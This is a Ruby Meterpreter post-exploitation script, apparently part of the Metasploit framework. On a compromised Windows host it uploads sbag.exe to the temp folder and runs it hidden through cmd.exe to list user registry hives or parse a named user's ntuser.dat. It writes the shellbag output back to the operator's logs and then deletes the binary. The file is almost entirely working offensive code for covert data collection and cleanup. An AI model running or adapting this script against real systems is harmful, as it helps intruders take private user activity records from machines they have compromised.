shellbag.rb

1. #
2. # Meterpreter script for uploading shellbag
3. #
4. # Author(s): James Fitts and Jason Haddix ++ Josh Grunzweig
5. #------------------------------------------------------------
6. ################## Variable Declarations ##################
7.  
8. info = @client.sys.config.sysinfo
9.  
10. # File to upload to the target host
11. file = File.join(Msf::Config.install_root, 'data', 'sbag.exe')
12.  
13. # Create Filename info to be appened to downloaded files
14. filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
15.  
16. # Create a directory for the logs
17. logs = ::File.join(Msf::Config.log_directory, 'scripts', 'shellbag', Rex::FileUtils.clean_path(info['Computer'] + filenameinfo))
18.  
19. @logfol = logs
20.  
21. # Create the log directory
22. ::FileUtils.mkdir_p(logs)
23.  
24. # Options
25. @@exec_opts = Rex::Parser::Arguments.new(
26. "-h" => [ false, "This help menu"],
27. "-u" => [ false, "Uploads sbag.exe to the C:\\WINDOWS\\TEMP directory"],
28. "-l" => [ false, "Lists the user hives available"],
29. "-d" => [ true, "Dumps the user hive to a file."],
30. "-r" => [ false, "Removes sbag.exe from the system"]
31. )
32.  
33. #-----------------------------------------------------------
34.  
35. def usage
36. print_line("Shellbag Meterpreter Script")
37. print_line("Usage: shellbag <options>")
38. print(@@exec_opts.usage)
39. raise Rex::Script::Completed
40. end
41.  
42. #-----------------------------------------------------------
43.  
44. def upload(session, file)
45. tmp = session.fs.file.expand_path("%TEMP%")
46. print_status("Uploading sbag.exe ...")
47. session.fs.file.upload_file("#{tmp}\\sbag.exe","#{file}")
48. print_status("sbag.exe uploaded as #{tmp}\\sbag.exe ...")
49. end
50.  
51. #-----------------------------------------------------------
52.  
53. def list()
54. print_status("Receiving data...")
55. tmp = session.fs.file.expand_path("%TEMP%")
56. r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe -livehives", nil, {'Hidden' => true,'Channelized' => true})
57. output = ""
58. while(d = r.channel.read)
59. output << d
60. end
61. r.channel.close
62. r.close
63. return output
64. end
65.  
66. #-----------------------------------------------------------
67.  
68. def dump(username)
69. print_status("Recieving data...")
70. tmp = session.fs.file.expand_path("%TEMP%")
71. r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe \"c:\\documents and settings\\#{username}\\ntuser.dat\"", nil, {'Hidden' => true,'Channelized' => true})
72. output = ""
73. while(d = r.channel.read)
74. output << d
75. end
76. r.channel.close
77. r.close
78. flname = "#{@logfol}/#{username}.txt"
79. file_local_write(flname, output)
80. print_status("Shellbag data successfully dumped to the logs!")
81. end
82.  
83. #-----------------------------------------------------------
84.  
85. def remove()
86. print_status("Removing sbag.exe from the system...")
87. tmp = session.fs.file.expand_path("%TEMP%")
88. session.sys.process.execute("cmd.exe /c del #{tmp}\\sbag.exe")
89. print_status("sbag.exe removed!")
90. end
91.  
92. ################## MAIN ##################
93.  
94. hlp = 0
95. upl = 0
96. lst = 0
97. dmp = 0
98. username = nil
99. rmv = 0
100.  
101. @@exec_opts.parse(args) { |opt, idx, val|
102. case opt
103. when "-h"
104. usage
105. when "-u"
106. upl = 1
107. when "-l"
108. lst = 1
109. when "-d"
110. dmp = 1
111. username = val
112. when "-r"
113. rmv = 1
114. end
115. }
116. if args.length < 1
117. usage()
118. elsif upl == 1
119. upload(session, file)
120. elsif lst == 1
121. print list()
122. elsif rmv == 1
123. remove()
124. elsif dmp == 1
125. dump(username)
126. end
127.  
128.